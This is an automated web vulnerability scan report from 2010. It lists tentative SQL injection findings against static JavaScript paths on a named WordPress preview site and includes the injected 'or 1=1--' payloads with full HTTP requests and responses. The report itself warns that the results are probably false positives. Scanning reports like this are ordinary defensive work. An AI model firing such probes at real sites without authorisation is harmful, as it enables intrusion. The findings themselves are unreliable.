Report generated by Hoyt LLC Research at Sat Nov 20 08:17:44 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research

1. SQL injection


Loading

1.1. http://alphanetsolutions.prontopreview.com/wp-content/plugins/cforms/js/cforms.js [REST URL parameter 1]

1.2. http://alphanetsolutions.prontopreview.com/wp-content/plugins/cforms/js/cforms.js [REST URL parameter 2]

1.3. http://alphanetsolutions.prontopreview.com/wp-content/plugins/cforms/js/cforms.js [REST URL parameter 3]

1.4. http://alphanetsolutions.prontopreview.com/wp-content/plugins/cforms/js/cforms.js [REST URL parameter 4]

1.5. http://alphanetsolutions.prontopreview.com/wp-content/plugins/cforms/js/cforms.js [REST URL parameter 5]

1.6. http://alphanetsolutions.prontopreview.com/wp-content/plugins/cforms/js/cforms.js [name of an arbitrarily supplied request parameter]

1.7. http://alphanetsolutions.prontopreview.com/wp-content/plugins/google-analyticator/external-tracking.min.js [REST URL parameter 1]

1.8. http://alphanetsolutions.prontopreview.com/wp-content/plugins/google-analyticator/external-tracking.min.js [REST URL parameter 2]

1.9. http://alphanetsolutions.prontopreview.com/wp-content/plugins/google-analyticator/external-tracking.min.js [REST URL parameter 3]

1.10. http://alphanetsolutions.prontopreview.com/wp-content/plugins/google-analyticator/external-tracking.min.js [REST URL parameter 4]

1.11. http://alphanetsolutions.prontopreview.com/wp-content/plugins/google-analyticator/external-tracking.min.js [name of an arbitrarily supplied request parameter]

1.12. http://alphanetsolutions.prontopreview.com/wp-content/plugins/google-analyticator/external-tracking.min.js [ver parameter]

1.13. http://alphanetsolutions.prontopreview.com/wp-content/themes/core/js/default.js [REST URL parameter 1]

1.14. http://alphanetsolutions.prontopreview.com/wp-content/themes/core/js/default.js [REST URL parameter 2]

1.15. http://alphanetsolutions.prontopreview.com/wp-content/themes/core/js/default.js [REST URL parameter 3]

1.16. http://alphanetsolutions.prontopreview.com/wp-content/themes/core/js/default.js [REST URL parameter 4]

1.17. http://alphanetsolutions.prontopreview.com/wp-content/themes/core/js/default.js [REST URL parameter 5]

1.18. http://alphanetsolutions.prontopreview.com/wp-content/themes/core/js/default.js [name of an arbitrarily supplied request parameter]

1.19. http://alphanetsolutions.prontopreview.com/wp-content/themes/core/js/jquery.cycle.all.2.72.js [REST URL parameter 1]

1.20. http://alphanetsolutions.prontopreview.com/wp-content/themes/core/js/jquery.cycle.all.2.72.js [REST URL parameter 2]

1.21. http://alphanetsolutions.prontopreview.com/wp-content/themes/core/js/jquery.cycle.all.2.72.js [REST URL parameter 3]

1.22. http://alphanetsolutions.prontopreview.com/wp-content/themes/core/js/jquery.cycle.all.2.72.js [REST URL parameter 4]

1.23. http://alphanetsolutions.prontopreview.com/wp-content/themes/core/js/jquery.cycle.all.2.72.js [REST URL parameter 5]

1.24. http://alphanetsolutions.prontopreview.com/wp-content/themes/core/js/jquery.cycle.all.2.72.js [name of an arbitrarily supplied request parameter]

2. Robots.txt file



1. SQL injection  next
There are 24 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://alphanetsolutions.prontopreview.com/wp-content/plugins/cforms/js/cforms.js [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://alphanetsolutions.prontopreview.com
Path:   /wp-content/plugins/cforms/js/cforms.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 47712398'%20or%201%3d1--%20 and 47712398'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content47712398'%20or%201%3d1--%20/plugins/cforms/js/cforms.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 20 Nov 2010 08:09:04 GMT
Server: Apache
Content-Length: 259
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /wp-content47712398' or 1=1-- /plugins/cforms/js/cforms.js
on this server.</p>
</body></html>

Request 2

GET /wp-content47712398'%20or%201%3d2--%20/plugins/cforms/js/cforms.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 500 Internal Server Error
Date: Sat, 20 Nov 2010 08:09:05 GMT
Server: Apache
Content-Length: 545
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
derek@prontomarketing.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p>
</body></html>

1.2. http://alphanetsolutions.prontopreview.com/wp-content/plugins/cforms/js/cforms.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://alphanetsolutions.prontopreview.com
Path:   /wp-content/plugins/cforms/js/cforms.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 76554686'%20or%201%3d1--%20 and 76554686'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins76554686'%20or%201%3d1--%20/cforms/js/cforms.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 20 Nov 2010 08:09:22 GMT
Server: Apache
Content-Length: 259
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /wp-content/plugins76554686' or 1=1-- /cforms/js/cforms.js
on this server.</p>
</body></html>

Request 2

GET /wp-content/plugins76554686'%20or%201%3d2--%20/cforms/js/cforms.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 500 Internal Server Error
Date: Sat, 20 Nov 2010 08:09:22 GMT
Server: Apache
Content-Length: 545
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
derek@prontomarketing.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p>
</body></html>

1.3. http://alphanetsolutions.prontopreview.com/wp-content/plugins/cforms/js/cforms.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://alphanetsolutions.prontopreview.com
Path:   /wp-content/plugins/cforms/js/cforms.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 14519186'%20or%201%3d1--%20 and 14519186'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/cforms14519186'%20or%201%3d1--%20/js/cforms.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 20 Nov 2010 08:09:32 GMT
Server: Apache
Content-Length: 259
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /wp-content/plugins/cforms14519186' or 1=1-- /js/cforms.js
on this server.</p>
</body></html>

Request 2

GET /wp-content/plugins/cforms14519186'%20or%201%3d2--%20/js/cforms.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 500 Internal Server Error
Date: Sat, 20 Nov 2010 08:09:32 GMT
Server: Apache
Content-Length: 545
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
derek@prontomarketing.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p>
</body></html>

1.4. http://alphanetsolutions.prontopreview.com/wp-content/plugins/cforms/js/cforms.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://alphanetsolutions.prontopreview.com
Path:   /wp-content/plugins/cforms/js/cforms.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 73046931'%20or%201%3d1--%20 and 73046931'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/cforms/js73046931'%20or%201%3d1--%20/cforms.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 20 Nov 2010 08:09:41 GMT
Server: Apache
Content-Length: 259
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /wp-content/plugins/cforms/js73046931' or 1=1-- /cforms.js
on this server.</p>
</body></html>

Request 2

GET /wp-content/plugins/cforms/js73046931'%20or%201%3d2--%20/cforms.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 500 Internal Server Error
Date: Sat, 20 Nov 2010 08:09:42 GMT
Server: Apache
Content-Length: 545
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
derek@prontomarketing.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p>
</body></html>

1.5. http://alphanetsolutions.prontopreview.com/wp-content/plugins/cforms/js/cforms.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://alphanetsolutions.prontopreview.com
Path:   /wp-content/plugins/cforms/js/cforms.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payloads 14124296'%20or%201%3d1--%20 and 14124296'%20or%201%3d2--%20 were each submitted in the REST URL parameter 5. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/cforms/js/cforms.js14124296'%20or%201%3d1--%20 HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 20 Nov 2010 08:09:52 GMT
Server: Apache
Content-Length: 259
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /wp-content/plugins/cforms/js/cforms.js14124296' or 1=1--
on this server.</p>
</body></html>

Request 2

GET /wp-content/plugins/cforms/js/cforms.js14124296'%20or%201%3d2--%20 HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 20 Nov 2010 08:09:52 GMT
Server: Apache
Content-Length: 255
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /wp-content/plugins/cforms/js/cforms.js14124296' or 1=2-- was not found on this server.</p>
</body></html>

1.6. http://alphanetsolutions.prontopreview.com/wp-content/plugins/cforms/js/cforms.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://alphanetsolutions.prontopreview.com
Path:   /wp-content/plugins/cforms/js/cforms.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 78962773%20or%201%3d1--%20 and 78962773%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/cforms/js/cforms.js?178962773%20or%201%3d1--%20=1 HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 20 Nov 2010 08:08:16 GMT
Server: Apache
Content-Length: 240
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /wp-content/plugins/cforms/js/cforms.js
on this server.</p>
</body></html>

Request 2

GET /wp-content/plugins/cforms/js/cforms.js?178962773%20or%201%3d2--%20=1 HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Proxy-Connection: keep-alive
Referer: http://www.alphanetsolutions.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 08:08:16 GMT
Server: Apache
Last-Modified: Thu, 20 May 2010 00:02:15 GMT
ETag: "2c0654-4383-486fb4981cfc0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Expires: Thu, 15 Nov 2010 20:00:00 GMT
Content-Type: application/x-javascript
Content-Length: 17283

/*
Copyright 2007, 2008, 2009 OLIVER SEIDEL (email : oliver.seidel @ deliciousdays.com)

This program is free software: you can redistribute it and/or modify it under the
terms of the GNU General Public License as published by the Free Software Foundation,
either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this
program. If not, see <http://www.gnu.org/licenses/>.
*/


// ONLY in case AJAX DOESN'T work you may want to double-check this path:
// If you do change this setting: CLEAR your BROWSER CACHE & RESTART you BROWSER!
var sajax_uri = '/wp-content/plugins/cforms/lib_ajax.php';


// No need to change anything here:
var sajax_debug_mode = false;
var sajax_request_type = 'POST';
var sajax_target_id = '';
var sajax_failure_redirect = '';

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('C 1t(59){f(7K)2l(59)}C 3g(){1t("3g() 5h..");l A;l 3B=1c 1z(\'3I.2V.6.0\',\'3I.2V.3.0\',\'3I.2V\',\'7q.2V\');O(l i=0;i<3B.D;i++){2X{A=1c 7i(3B[i])}2B(e){A=2e}}f(!A&&3S 3V!="3X")A=1c 3V();f(!A)1t("56 55 5m 5n 3M.");v A}l 2h=1c 1z();C 7d(){O(l i=0;i<2h.D;i+
...[SNIP]...

1.7. http://alphanetsolutions.prontopreview.com/wp-content/plugins/google-analyticator/external-tracking.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://alphanetsolutions.prontopreview.com
Path:   /wp-content/plugins/google-analyticator/external-tracking.min.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15362751'%20or%201%3d1--%20 and 15362751'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content15362751'%20or%201%3d1--%20/plugins/google-analyticator/external-tracking.min.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 20 Nov 2010 08:09:19 GMT
Server: Apache
Content-Length: 284
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /wp-content15362751' or 1=1-- /plugins/google-analyticator/external-tracking.min.js
on this server.</p>
</body></html>

Request 2

GET /wp-content15362751'%20or%201%3d2--%20/plugins/google-analyticator/external-tracking.min.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 500 Internal Server Error
Date: Sat, 20 Nov 2010 08:09:19 GMT
Server: Apache
Content-Length: 545
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
derek@prontomarketing.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p>
</body></html>

1.8. http://alphanetsolutions.prontopreview.com/wp-content/plugins/google-analyticator/external-tracking.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://alphanetsolutions.prontopreview.com
Path:   /wp-content/plugins/google-analyticator/external-tracking.min.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 18407317'%20or%201%3d1--%20 and 18407317'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins18407317'%20or%201%3d1--%20/google-analyticator/external-tracking.min.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 20 Nov 2010 08:09:33 GMT
Server: Apache
Content-Length: 284
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /wp-content/plugins18407317' or 1=1-- /google-analyticator/external-tracking.min.js
on this server.</p>
</body></html>

Request 2

GET /wp-content/plugins18407317'%20or%201%3d2--%20/google-analyticator/external-tracking.min.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 500 Internal Server Error
Date: Sat, 20 Nov 2010 08:09:34 GMT
Server: Apache
Content-Length: 545
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
derek@prontomarketing.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p>
</body></html>

1.9. http://alphanetsolutions.prontopreview.com/wp-content/plugins/google-analyticator/external-tracking.min.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://alphanetsolutions.prontopreview.com
Path:   /wp-content/plugins/google-analyticator/external-tracking.min.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 14117474'%20or%201%3d1--%20 and 14117474'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/google-analyticator14117474'%20or%201%3d1--%20/external-tracking.min.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Sat, 20 Nov 2010 08:09:43 GMT
Server: Apache
Content-Length: 284
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /wp-content/plugins/google-analyticator14117474' or 1=1-- /external-tracking.min.js
on this server.</p>
</body></html>

Request 2

GET /wp-content/plugins/google-analyticator14117474'%20or%201%3d2--%20/external-tracking.min.js HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 500 Internal Server Error
Date: Sat, 20 Nov 2010 08:09:43 GMT
Server: Apache
Content-Length: 545
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
derek@prontomarketing.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p>
</body></html>

1.10. http://alphanetsolutions.prontopreview.com/wp-content/plugins/google-analyticator/external-tracking.min.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://alphanetsolutions.prontopreview.com
Path:   /wp-content/plugins/google-analyticator/external-tracking.min.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 47810127'%20or%201%3d1--%20 and 47810127'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/google-analyticator/external-tracking.min.js47810127'%20or%201%3d1--%20 HTTP/1.1
Host: alphanetsolutions.prontopreview.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

